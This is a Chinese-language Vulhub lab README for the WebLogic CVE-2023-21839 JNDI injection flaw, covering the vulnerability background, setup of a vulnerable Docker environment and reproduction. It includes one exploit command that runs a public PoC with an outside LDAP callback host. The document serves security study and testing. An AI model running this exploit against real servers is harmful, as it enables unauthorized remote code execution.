aaronxu/vulhub
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
main
vulhub/weblogic/CVE-2023-21839/README.zh-cn.md
Aaron 63285f61aa
Some checks failed
Vulhub Format Check and Lint / format-check (push) Has been cancelled
Details
Vulhub Format Check and Lint / markdown-check (push) Has been cancelled
Details
Vulhub Docker Image CI / longtime-images-test (push) Has been cancelled
Details
Vulhub Docker Image CI / images-test (push) Has been cancelled
Details
first commit
2025-09-06 16:08:15 +08:00

36 lines
1.3 KiB
Markdown
Raw Permalink Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# WebLogic未授权远程代码执行漏洞 (CVE-2023-21839)
Oracle WebLogic Server是业界广泛使用的Java EE企业级应用服务器。
在[Oracle 2023年1月安全公告](https://www.oracle.com/security-alerts/cpujan2023.html)中Oracle修复了影响WebLogic Server 12.2.1.3.0、12.2.1.4.0和14.1.1.0.0版本的严重安全漏洞CVE-2023-21839。
该漏洞允许未授权远程攻击者通过T3或IIOP协议发起JNDI lookup操作。如果JDK版本过低或本地存在可用的反序列化gadgetjavaSerializedData攻击者可进一步实现远程代码执行RCE
参考链接:
- <https://www.oracle.com/security-alerts/cpujan2023.html>
- <https://nvd.nist.gov/vuln/detail/CVE-2023-21839>
- <https://github.com/houqe/POC_CVE-2023-21839>
## 环境设置
执行以下命令启动WebLogic Server 12.2.1.3漏洞环境:
```
docker compose up -d
```
启动完成后,访问`http://your-ip:7001/console`可以看到WebLogic管理控制台登录页。
## 漏洞复现
你可以使用公开的POC工具<https://github.com/houqe/POC_CVE-2023-21839>进行漏洞复现。
```shell
python CVE-2023-21839.py -ip 192.168.25.129 -p 7001 -l ldap://craft.ldap.tld/test
```
漏洞利用成功后可在DNSLog平台或LDAP服务端看到来自目标服务器的请求如下图所示
![](1.png)
Reference in New Issue View Git Blame Copy Permalink